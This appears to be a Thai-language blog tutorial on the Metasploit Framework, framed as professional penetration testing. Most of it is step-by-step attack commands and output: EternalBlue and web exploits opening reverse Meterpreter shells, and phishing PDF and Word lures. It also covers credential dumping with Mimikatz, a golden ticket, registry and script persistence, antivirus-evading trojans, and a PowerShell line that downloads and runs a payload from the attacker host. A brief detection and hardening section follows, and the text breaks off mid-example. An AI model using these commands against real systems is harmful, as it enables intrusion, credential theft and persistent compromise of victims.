วันที่ Security Testing เป็นเรื่องลึกลับ
ก่อนรู้จัก Metasploit การทำ security testing เป็นเหมือนเดาสี:
วิธีการ Security Testing แบบเก่า:
# 1. Manual vulnerability scanning
nmap -sV -sC target.example.com
# แล้วก็งมๆ ว่าจะทำอะไรต่อ 😅
# 2. Random exploit attempts
# Google: "how to exploit apache 2.4.41"
# Copy-paste commands จาก tutorial
curl -X POST "http://target.com/vulnerable_endpoint" -d "payload"
# 3. No systematic approach
# Test แบบลุ้นๆ ไม่รู้ว่าจะเจออะไร
# ไม่มี methodology ชัดเจน
# 4. Limited exploit knowledge
# รู้จักแค่ SQL injection กับ XSS
# ไม่รู้จัก advanced attack vectors
ปัญหาที่เจอบ่อย:
- No Standardized Methodology: ไม่มีขั้นตอนที่ชัดเจน
- Limited Exploit Database: หาช่องโหว่ได้แต่ไม่รู้จะ exploit ยังไง
- Manual Process: ใช้เวลานานและไม่มีประสิทธิภาพ
- No Payload Generation: ไม่รู้จักสร้าง custom payloads
- Poor Documentation: ไม่มีระบบบันทึกผลการทดสอบ
- Inconsistent Results: ผลการทดสอบไม่น่าเชื่อถือ
ตัวอย่างความงงงวย:
# สถานการณ์จริงที่เกิดขึ้น 😅
# 1. เจอช่องโหว่ แต่ไม่รู้จะ exploit ยังไง
nmap -sV 192.168.1.100
# PORT STATE SERVICE VERSION
# 21/tcp open ftp ProFTPD 1.3.5
# 22/tcp open ssh OpenSSH 7.4
# 80/tcp open http Apache httpd 2.4.41
# Google: "ProFTPD 1.3.5 exploit"
# เจอเยอะ แต่ไม่รู้อันไหนใช้ได้ 😕
# 2. Payload ไม่ work
# Copy-paste exploit code จาก internet
python exploit.py 192.168.1.100
# Error: Connection refused
# Error: Payload failed
# ปรับแต่งไม่เป็น งมต่อ... 😞
# 3. ไม่มีแผนชัดเจน
# เริ่มจาก port scan
# แล้วก็ไปเหมือนใครว่าง
# ไม่รู้ว่าควรทดสอบอะไรต่อไป
ผลลัพธ์: Security testing ที่ไม่มีประสิทธิภาพและไม่ครอบคลุม! 😰
จนวันหนึ่งพบ Metasploit Framework แล้วชีวิตเปลี่ยนไป! 🎯
Metasploit Framework Fundamentals
1. Metasploit Architecture
Framework Components:
┌─────────────────────────────────────────┐
│ Metasploit Framework │
│ │
│ ┌─────────────┐ ┌─────────────┐ │
│ │ Exploits │ │ Payloads │ │
│ │ (2000+) │ │ (500+) │ │
│ └─────────────┘ └─────────────┘ │
│ │
│ ┌─────────────┐ ┌─────────────┐ │
│ │ Auxiliaries │ │ Encoders │ │
│ │ (1000+) │ │ (50+) │ │
│ └─────────────┘ └─────────────┘ │
│ │
│ ┌─────────────┐ ┌─────────────┐ │
│ │ NOPs │ │ Post │ │
│ │ (10+) │ │ (200+) │ │
│ └─────────────┘ └─────────────┘ │
└─────────────────────────────────────────┘
Core Concepts:
- Exploits: โค้ดสำหรับใช้ประโยชน์จากช่องโหว่
- Payloads: โค้ดที่รันหลังจาก exploit สำเร็จ
- Auxiliaries: เครื่องมือช่วยเหลือ (scanners, fuzzers)
- Encoders: เข้ารหัส payload เพื่อหลบ detection
- NOPs: No Operation instructions สำหรับ buffer alignment
- Post-exploitation: เครื่องมือหลัง compromise ระบบแล้ว
2. Metasploit Installation
# Kali Linux (มาพร้อม)
sudo apt update && sudo apt upgrade
msfconsole
# Ubuntu/Debian
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall
# Docker
docker pull metasploitframework/metasploit-framework
docker run --rm -it -v ~/.msf4:/home/msf/.msf4 -p 4444:4444 metasploitframework/metasploit-framework
3. Database Setup และ Configuration
# Initialize PostgreSQL database
sudo systemctl start postgresql
sudo -u postgres createuser msf -P -S -R -D
sudo -u postgres createdb -O msf msf
# Configure database in Metasploit
msfconsole
msf6 > db_connect -y /usr/share/metasploit-framework/config/database.yml
# Check database status
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
# Rebuild cache
msf6 > db_rebuild_cache
# Workspace management
msf6 > workspace
[*] Available workspaces:
[*] default
msf6 > workspace -a pentest_project_1
[*] Added workspace: pentest_project_1
[*] Workspace: pentest_project_1
msf6 > workspace pentest_project_1
[*] Workspace: pentest_project_1
Information Gathering และ Reconnaissance
1. Network Discovery
# Nmap integration
msf6 > db_nmap -sS -A 192.168.1.0/24
[*] Nmap: Starting Nmap 7.94 ( https://nmap.org )
[*] Nmap: Nmap scan report for 192.168.1.100
[*] Nmap: Host is up (0.001s latency).
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp ProFTPD 1.3.5
[*] Nmap: 22/tcp open ssh OpenSSH 7.4p1
[*] Nmap: 80/tcp open http Apache httpd 2.4.41
[*] Nmap: 139/tcp open netbios-ssn Samba smbd 4.6.2
[*] Nmap: 445/tcp open netbios-ssn Samba smbd 4.6.2
# View discovered hosts
msf6 > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.1.100 00:0c:29:xx:xx:xx Linux Ubuntu 16.04 server
192.168.1.101 00:0c:29:yy:yy:yy Windows 10 desktop
# View discovered services
msf6 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.1.100 21 tcp ftp open ProFTPD 1.3.5
192.168.1.100 22 tcp ssh open OpenSSH 7.4p1
192.168.1.100 80 tcp http open Apache httpd 2.4.41
192.168.1.100 139 tcp netbios-ssn open Samba smbd 4.6.2
192.168.1.100 445 tcp netbios-ssn open Samba smbd 4.6.2
2. Service Enumeration
# SMB enumeration
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 192.168.1.100:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1)
[*] 192.168.1.100:445 - Host is running SMB 1.0 (vulnerable to EternalBlue!)
# HTTP enumeration
msf6 > use auxiliary/scanner/http/http_version
msf6 auxiliary(scanner/http/http_version) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/http/http_version) > run
[+] 192.168.1.100:80 Apache/2.4.41 (Ubuntu)
# Directory enumeration
msf6 > use auxiliary/scanner/http/dir_scanner
msf6 auxiliary(scanner/http/dir_scanner) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/http/dir_scanner) > set DICTIONARY /usr/share/metasploit-framework/data/wordlists/directory.txt
msf6 auxiliary(scanner/http/dir_scanner) > run
[+] 192.168.1.100:80 - Found http://192.168.1.100:80/admin/
[+] 192.168.1.100:80 - Found http://192.168.1.100:80/backup/
[+] 192.168.1.100:80 - Found http://192.168.1.100:80/uploads/
# FTP enumeration
msf6 > use auxiliary/scanner/ftp/ftp_version
msf6 auxiliary(scanner/ftp/ftp_version) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/ftp/ftp_version) > run
[+] 192.168.1.100:21 - FTP Banner: '220 ProFTPD 1.3.5 Server ready.\x0d\x0a'
3. Vulnerability Assessment
# SMB vulnerability scan
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.1.100:445 - Host is likely VULNERABLE to MS17-010! (EternalBlue)
[*] 192.168.1.100:445 - Scanned 1 of 1 hosts (100% complete)
# SSH vulnerability scan
msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/ssh/ssh_version) > run
[+] 192.168.1.100:22 - SSH server version: SSH-2.0-OpenSSH_7.4p1 Ubuntu-10ubuntu1.4
# Web application vulnerability scan
msf6 > use auxiliary/scanner/http/http_put
msf6 auxiliary(scanner/http/http_put) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/http/http_put) > set PATH /uploads/
msf6 auxiliary(scanner/http/http_put) > run
[+] 192.168.1.100:80 - Upload succeeded on /uploads/ (201)
[+] 192.168.1.100:80 - File stored at http://192.168.1.100:80/uploads/msf_http_put_test.txt
Exploitation Techniques
1. EternalBlue (MS17-010) Exploitation
# Search for EternalBlue exploit
msf6 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Code Execution
1 auxiliary/scanner/smb/smb_ms17_010 2017-03-14 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Code Execution
3 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Code Execution
# Use EternalBlue exploit
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s)
RPORT 445 yes The target port (TCP)
SMBDomain . no SMB Domain
SMBPass no SMB Password
SMBUser no SMB Username
VERIFY_ARCH true yes Check if remote architecture matches exploit Target
VERIFY_TARGET true yes Check if remote OS matches exploit Target
# Configure target
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.101
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.50
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
# Check if target is vulnerable
msf6 exploit(windows/smb/ms17_010_eternalblue) > check
[+] 192.168.1.101:445 - The target is vulnerable.
# Execute exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.1.50:4444
[*] 192.168.1.101:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.1.101:445 - Host is likely VULNERABLE to MS17-010!
[*] 192.168.1.101:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.1.101:445 - The target is vulnerable.
[*] 192.168.1.101:445 - Connecting to target for exploitation.
[+] 192.168.1.101:445 - Connection established for exploitation.
[+] 192.168.1.101:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.101:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.1.101:445 - Sending stage (200774 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.50:4444 -> 192.168.1.101:49158)
meterpreter >
2. Web Application Exploitation
# PHP file upload vulnerability
msf6 > use exploit/multi/http/php_cgi_arg_injection
msf6 exploit(multi/http/php_cgi_arg_injection) > set RHOSTS 192.168.1.100
msf6 exploit(multi/http/php_cgi_arg_injection) > set TARGETURI /vulnerable_app/
msf6 exploit(multi/http/php_cgi_arg_injection) > set payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/php_cgi_arg_injection) > set LHOST 192.168.1.50
msf6 exploit(multi/http/php_cgi_arg_injection) > exploit
[*] Started reverse TCP handler on 192.168.1.50:4444
[*] 192.168.1.100:80 - Sending stage (39927 bytes) to 192.168.1.100
[*] Meterpreter session 2 opened (192.168.1.50:4444 -> 192.168.1.100:34567)
# Unrestricted file upload
msf6 > use exploit/unix/webapp/php_fileupload_exec
msf6 exploit(unix/webapp/php_fileupload_exec) > set RHOSTS 192.168.1.100
msf6 exploit(unix/webapp/php_fileupload_exec) > set TARGETURI /uploads/
msf6 exploit(unix/webapp/php_fileupload_exec) > set payload php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/php_fileupload_exec) > set LHOST 192.168.1.50
msf6 exploit(unix/webapp/php_fileupload_exec) > exploit
# SQL injection exploitation
msf6 > use auxiliary/admin/mssql/mssql_exec
msf6 auxiliary(admin/mssql/mssql_exec) > set RHOSTS 192.168.1.102
msf6 auxiliary(admin/mssql/mssql_exec) > set USERNAME sa
msf6 auxiliary(admin/mssql/mssql_exec) > set PASSWORD password123
msf6 auxiliary(admin/mssql/mssql_exec) > set CMD "whoami"
msf6 auxiliary(admin/mssql/mssql_exec) > run
[*] 192.168.1.102:1433 - SQL Query: EXEC master..xp_cmdshell 'whoami'
[*] 192.168.1.102:1433 - Row Count: 1 (Status: 16 Command: 193)
[*] 192.168.1.102:1433 - | nt authority\system
3. Social Engineering Attacks
# Generate malicious PDF
msf6 > use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > set LHOST 192.168.1.50
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > set FILENAME "Important_Document.pdf"
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > exploit
[*] Creating 'Important_Document.pdf' file...
[+] Important_Document.pdf stored at /home/kali/.msf4/local/Important_Document.pdf
# Generate malicious Office document
msf6 > use exploit/windows/fileformat/office_word_hta
msf6 exploit(windows/fileformat/office_word_hta) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/office_word_hta) > set LHOST 192.168.1.50
msf6 exploit(windows/fileformat/office_word_hta) > set FILENAME "Annual_Report.docx"
msf6 exploit(windows/fileformat/office_word_hta) > exploit
[*] Creating 'Annual_Report.docx' file...
[+] Annual_Report.docx stored at /home/kali/.msf4/local/Annual_Report.docx
# Setup listener for payload
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.50
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.1.50:4444
Post-Exploitation Activities
1. Meterpreter Basics
# Meterpreter session management
meterpreter > sysinfo
Computer : WIN10-TARGET
OS : Windows 10 (10.0 Build 19041).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
# File system operations
meterpreter > pwd
C:\Users\victim\Desktop
meterpreter > ls
Listing: C:\Users\victim\Desktop
================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2024-01-15 14:30:25 +0700 desktop.ini
100777/rwxrwxrwx 1024 fil 2024-01-15 10:15:30 +0700 passwords.txt
100666/rw-rw-rw- 2048 fil 2024-01-15 09:45:12 +0700 secrets.docx
meterpreter > download passwords.txt /tmp/
[*] Downloading: passwords.txt -> /tmp/passwords.txt
[*] Downloaded 1.00 KiB of 1.00 KiB (100.0%): passwords.txt -> /tmp/passwords.txt
[*] Completed : passwords.txt -> /tmp/passwords.txt
meterpreter > upload /tmp/backdoor.exe C:\\Windows\\Temp\\
[*] Uploading : /tmp/backdoor.exe -> C:\Windows\Temp\backdoor.exe
[*] Uploaded 73.80 KiB of 73.80 KiB (100.0%): /tmp/backdoor.exe -> C:\Windows\Temp\backdoor.exe
[*] Completed : /tmp/backdoor.exe -> C:\Windows\Temp\backdoor.exe
# Process management
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
88 4 Registry x64 0
428 4 smss.exe x64 0
536 528 csrss.exe x64 0
1234 1180 explorer.exe x64 1 WIN10-TARGET\victim C:\Windows\explorer.exe
2456 1234 notepad.exe x64 1 WIN10-TARGET\victim C:\Windows\System32\notepad.exe
meterpreter > migrate 1234
[*] Migrating from 3456 to 1234...
[*] Migration completed successfully.
2. Privilege Escalation
# Check current privileges
meterpreter > getuid
Server username: WIN10-TARGET\victim
# Get system information
meterpreter > run post/windows/gather/win_privs
[*] Current privileges:
[*] SeShutdownPrivilege
[*] SeChangeNotifyPrivilege
[*] SeUndockPrivilege
[*] SeIncreaseWorkingSetPrivilege
[*] SeTimeZonePrivilege
# Automatic privilege escalation
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 192.168.1.101 - Collecting local exploits for x64/windows...
[*] 192.168.1.101 - 31 exploit checks are being tried...
[+] 192.168.1.101 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 192.168.1.101 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target appears to be vulnerable.
# Use UAC bypass
meterpreter > background
[*] Backgrounding session 1...
msf6 > use exploit/windows/local/bypassuac_eventvwr
msf6 exploit(windows/local/bypassuac_eventvwr) > set SESSION 1
msf6 exploit(windows/local/bypassuac_eventvwr) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_eventvwr) > set LHOST 192.168.1.50
msf6 exploit(windows/local/bypassuac_eventvwr) > set LPORT 5555
msf6 exploit(windows/local/bypassuac_eventvwr) > exploit
[*] Started reverse TCP handler on 192.168.1.50:5555
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Sending stage (200774 bytes) to 192.168.1.101
[*] Meterpreter session 2 opened (192.168.1.50:5555 -> 192.168.1.101:49159)
meterpreter > getuid
Server username: WIN10-TARGET\victim
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
3. Credential Harvesting
# Dump password hashes
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
victim:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
# Load Kiwi extension (Mimikatz)
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
# Dump credentials from memory
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain LM NTLM
-------- ------ -- ----
victim WIN10-TARGET aad3b435b51404eeaad3b435b51404ee 8846f7eaee8fb117ad06bdd830b7586c
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
DESKTOP-ABC123$ WORKGROUP (null)
victim WIN10-TARGET P@ssw0rd123!
# Search for credentials in files
meterpreter > run post/windows/gather/credentials/credential_collector
[*] Running module against WIN10-TARGET
[*] Extracting credentials from system...
[+] Found credentials in C:\Users\victim\Documents\passwords.txt
[+] Found credentials in registry...
4. Persistence Mechanisms
# Create persistent backdoor
meterpreter > run persistence -S -U -X -i 10 -p 6666 -r 192.168.1.50
[*] Running Persistence Script
[*] Resource file for cleanup created at /home/kali/.msf4/logs/persistence/WIN10-TARGET_20240115.3456/WIN10-TARGET_20240115.3456.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=6666
[*] Persistent agent script is 612841 bytes long
[+] Persistent Script written to C:\Windows\TEMP\CyberSafe.vbs
[*] Starting connection handler at port 6666 for windows/meterpreter/reverse_tcp
[*] Persistent VBS script service installed on target
# Golden ticket attack (with domain admin privileges)
meterpreter > load kiwi
meterpreter > dcsync_ntlm krbtgt
[DC] 'domain.local' will be the domain
[DC] 'DC01.domain.local' will be the DC server
[DC] 'krbtgt' will be the user account
[*] Retrieving user information for krbtgt
Object RDN : krbtgt
SAM Account name : krbtgt
Account SID : S-1-5-21-123456789-123456789-123456789-502
Hash NTLM: a9b30e5b0dc865eadcea9411e4ade72d
meterpreter > golden_ticket_create -u Administrator -d domain.local -k a9b30e5b0dc865eadcea9411e4ade72d -s S-1-5-21-123456789-123456789-123456789 -t /tmp/golden.kirbi
[+] Golden ticket created successfully
# Registry persistence
meterpreter > reg setval -k "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" -v "Windows Update" -t REG_SZ -d "C:\\Windows\\Temp\\backdoor.exe"
[*] Successful set Windows Update.
Advanced Exploitation Techniques
1. Pivoting และ Network Traversal
# Add route for internal network
meterpreter > run autoroute -s 10.0.0.0/24
[*] Adding a route to 10.0.0.0/255.255.255.0...
[+] Added route to 10.0.0.0/255.255.255.0 via 192.168.1.101
[*] Use the -p option to list all active routes
# Setup SOCKS proxy
meterpreter > background
[*] Backgrounding session 1...
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 1080
msf6 auxiliary(server/socks_proxy) > set VERSION 4a
msf6 auxiliary(server/socks_proxy) > run -j
[*] Auxiliary module running as background job 1.
[*] Starting the SOCKS proxy server
# Pivot through compromised host
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.0.0.5
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
# Port forwarding
meterpreter > portfwd add -l 3389 -p 3389 -r 10.0.0.5
[*] Local TCP relay created: :3389 <-> 10.0.0.5:3389
# Use proxychains for external tools
echo "socks4 127.0.0.1 1080" >> /etc/proxychains.conf
proxychains nmap -sT 10.0.0.0/24
2. Evasion Techniques
# Encode payload to evade AV
msf6 > use payload/windows/meterpreter/reverse_tcp
msf6 payload(windows/meterpreter/reverse_tcp) > set LHOST 192.168.1.50
msf6 payload(windows/meterpreter/reverse_tcp) > set LPORT 4444
msf6 payload(windows/meterpreter/reverse_tcp) > generate -f exe -e x86/shikata_ga_nai -i 10 -o /tmp/payload_encoded.exe
[*] Writing 73802 bytes to /tmp/payload_encoded.exe...
[*] Final size of exe file: 73802 bytes
# Custom payload with template
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -x /tmp/legitimate_app.exe -k -f exe -o /tmp/trojan.exe
# Staged vs stageless payload
# Staged (smaller, but requires callback)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o staged.exe
# Stageless (larger, but self-contained)
msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o stageless.exe
# PowerShell payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f psh-cmd
# Shellcode injection
meterpreter > migrate 1234
[*] Migrating from 5678 to 1234...
[*] Migration completed successfully.
# In-memory execution
meterpreter > execute -H -i -f powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.50/payload.ps1')"
3. Custom Module Development
# custom_scanner.rb
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Custom Service Scanner',
'Description' => 'Scans for custom service vulnerabilities',
'Author' => 'Your Name',
'License' => MSF_LICENSE
)
register_options([
Opt::RPORT(8080),
OptString.new('TARGETURI', [true, 'Path to scan', '/'])
])
end
def run_host(ip)
begin
connect
request = "GET #{datastore['TARGETURI']} HTTP/1.1\r\n"
request << "Host: #{ip}\r\n"
request << "User-Agent: Mozilla/5.0\r\n"
request << "\r\n"
sock.put(request)
response = sock.recv(1024)
if response =~ /CustomServer\/1\.0/
print_good("#{ip}:#{rport} - Custom server detected")
# Additional vulnerability checks here
end
rescue ::Exception => e
print_error("#{ip}:#{rport} - Error: #{e}")
ensure
disconnect
end
end
end
# Load custom module
msf6 > loadpath /path/to/custom/modules
msf6 > reload_all
msf6 > use auxiliary/scanner/http/custom_scanner
msf6 auxiliary(scanner/http/custom_scanner) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(scanner/http/custom_scanner) > run
Reporting และ Documentation
1. Automated Report Generation
# Generate workspace report
msf6 > workspace pentest_project_1
msf6 > db_export -f xml /tmp/pentest_results.xml
# Export specific data
msf6 > hosts -o /tmp/discovered_hosts.csv
msf6 > services -o /tmp/discovered_services.csv
msf6 > vulns -o /tmp/vulnerabilities.csv
msf6 > creds -o /tmp/credentials.csv
msf6 > loot -o /tmp/loot_files.csv
# Generate HTML report
msf6 > load auto_add_route
msf6 > load sounds
msf6 > load report_generation
msf6 > generate_report html /tmp/pentest_report.html
2. Custom Reporting Scripts
#!/usr/bin/env ruby
# generate_report.rb
require 'msf/core'
require 'msf/core/db'
framework = Msf::Simple::Framework.create
# Connect to database
framework.db.connect
# Get workspace
workspace = framework.db.workspace
puts "=== PENETRATION TEST REPORT ==="
puts "Workspace: #{workspace.name}"
puts "Generated: #{Time.now}"
puts
# Hosts summary
hosts = framework.db.hosts
puts "=== DISCOVERED HOSTS (#{hosts.count}) ==="
hosts.each do |host|
puts "#{host.address} - #{host.os_name} #{host.os_flavor}"
end
puts
# Services summary
services = framework.db.services
puts "=== DISCOVERED SERVICES (#{services.count}) ==="
services.group_by(&:port).sort.each do |port, svcs|
puts "Port #{port}: #{svcs.map(&:name).uniq.join(', ')}"
end
puts
# Vulnerabilities
vulns = framework.db.vulns
puts "=== VULNERABILITIES (#{vulns.count}) ==="
vulns.each do |vuln|
puts "#{vuln.host.address}:#{vuln.service.port} - #{vuln.name}"
end
puts
# Credentials
creds = framework.db.creds
puts "=== CREDENTIALS (#{creds.count}) ==="
creds.each do |cred|
puts "#{cred.core.public} : #{cred.core.private}"
end
3. Integration with External Tools
# Export to Metasploit Pro
msf6 > pro_import /tmp/nessus_results.nessus
# Integration with Nessus
msf6 > load nessus
msf6 > nessus_connect username:password@nessus.server.com:8834
msf6 > nessus_scan_new -t "Basic Network Scan" -n "Pentest Scan" 192.168.1.0/24
msf6 > nessus_report_vulns <scan_id>
# Integration with OpenVAS
msf6 > load openvas
msf6 > openvas_connect username password localhost 9392
msf6 > openvas_target_create "Pentest Target" "192.168.1.0/24" "Full and fast"
msf6 > openvas_task_start <task_id>
# Integration with Cobalt Strike
# Generate Cobalt Strike payload
msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.1.50 LPORT=80 -f exe -o cs_beacon.exe
# Setup handler for Cobalt Strike beacons
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set LHOST 192.168.1.50
msf6 exploit(multi/handler) > set LPORT 80
msf6 exploit(multi/handler) > exploit -j
Defensive Considerations
1. Detection และ Mitigation
# Indicators of Compromise (IOCs)
echo "=== METASPLOIT IOCs ===" > /tmp/iocs.txt
echo "Network connections to known Metasploit default ports (4444, 4445)" >> /tmp/iocs.txt
echo "Suspicious PowerShell execution with encoded commands" >> /tmp/iocs.txt
echo "Meterpreter process injection into legitimate processes" >> /tmp/iocs.txt
echo "Unusual network traffic patterns (reverse shells)" >> /tmp/iocs.txt
echo "Registry modifications in Run keys for persistence" >> /tmp/iocs.txt
# Signatures for detection
# Snort rule for Meterpreter traffic
alert tcp any any -> any any (msg:"Meterpreter Traffic Detected"; content:"RECV"; flow:established; sid:1000001;)
# YARA rule for Meterpreter payloads
rule Meterpreter_Payload {
meta:
description = "Detects Meterpreter payload signatures"
author = "Security Team"
strings:
$metsrv = "metsrv.dll" nocase
$revtcp = "reverse_tcp" nocase
$stage = "windows/meterpreter" nocase
condition:
any of them
}
# PowerShell logging to detect suspicious activity
# Enable PowerShell script block logging
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 1
# Monitor for suspicious PowerShell commands
Get-WinEvent -FilterHashtable @{LogName="Microsoft-Windows-PowerShell/Operational"; ID=4104} | Where-Object {$_.Message -match "DownloadString|IEX|Invoke-Expression"}
2. Hardening Recommendations
# Network security
echo "=== NETWORK SECURITY ===" > /tmp/hardening.txt
echo "1. Implement network segmentation" >> /tmp/hardening.txt
echo "2. Use intrusion detection systems (IDS/IPS)" >> /tmp/hardening.txt
echo "3. Deploy network access control (NAC)" >> /tmp/hardening.txt
echo "4. Monitor network traffic for anomalies" >> /tmp/hardening.txt
# Endpoint security
echo "=== ENDPOINT SECURITY ===" >> /tmp/hardening.txt
echo "1. Keep systems updated with security patches" >> /tmp/hardening.txt
echo "2. Deploy endpoint detection and response (EDR)" >> /tmp/hardening.txt
echo "3. Implement application whitelisting" >> /tmp/hardening.txt
echo "4. Use behavioral analysis for malware detection" >> /tmp/hardening.txt
# Access controls
echo "=== ACCESS CONTROLS ===" >> /tmp/hardening.txt
echo "1. Implement principle of least privilege" >> /tmp/hardening.txt
echo "2. Use multi-factor authentication (MFA)" >> /tmp/hardening.txt
echo "3. Regular access reviews and deprovisioning" >> /tmp/hardening.txt
echo "4. Monitor privileged account usage" >> /tmp/hardening.txt
# Security monitoring
echo "=== SECURITY MONITORING ===" >> /tmp/hardening.txt
echo "1. Centralized logging and SIEM" >> /tmp/hardening.txt
echo "2. Real-time threat intelligence" >> /tmp/hardening.txt
echo "3. Incident response procedures" >> /tmp/hardening.txt
echo "4. Regular vulnerability assessments" >> /tmp/hardening.txt
เคสจริง: จาก Amateur Pentesting สู่ Professional Security Assessment
ก่อนใช้ Metasploit Framework
ปัญหาที่เจอจริง:
# สถานการณ์วุ่นวายในการทำ penetration testing
# 1. Manual vulnerability exploitation
# เจอ vulnerability จาก Nessus scan
nmap -sV 192.168.1.100
# PORT STATE SERVICE VERSION
# 21/tcp open ftp ProFTPD 1.3.5
# Google: "ProFTPD 1.3.5 exploit"
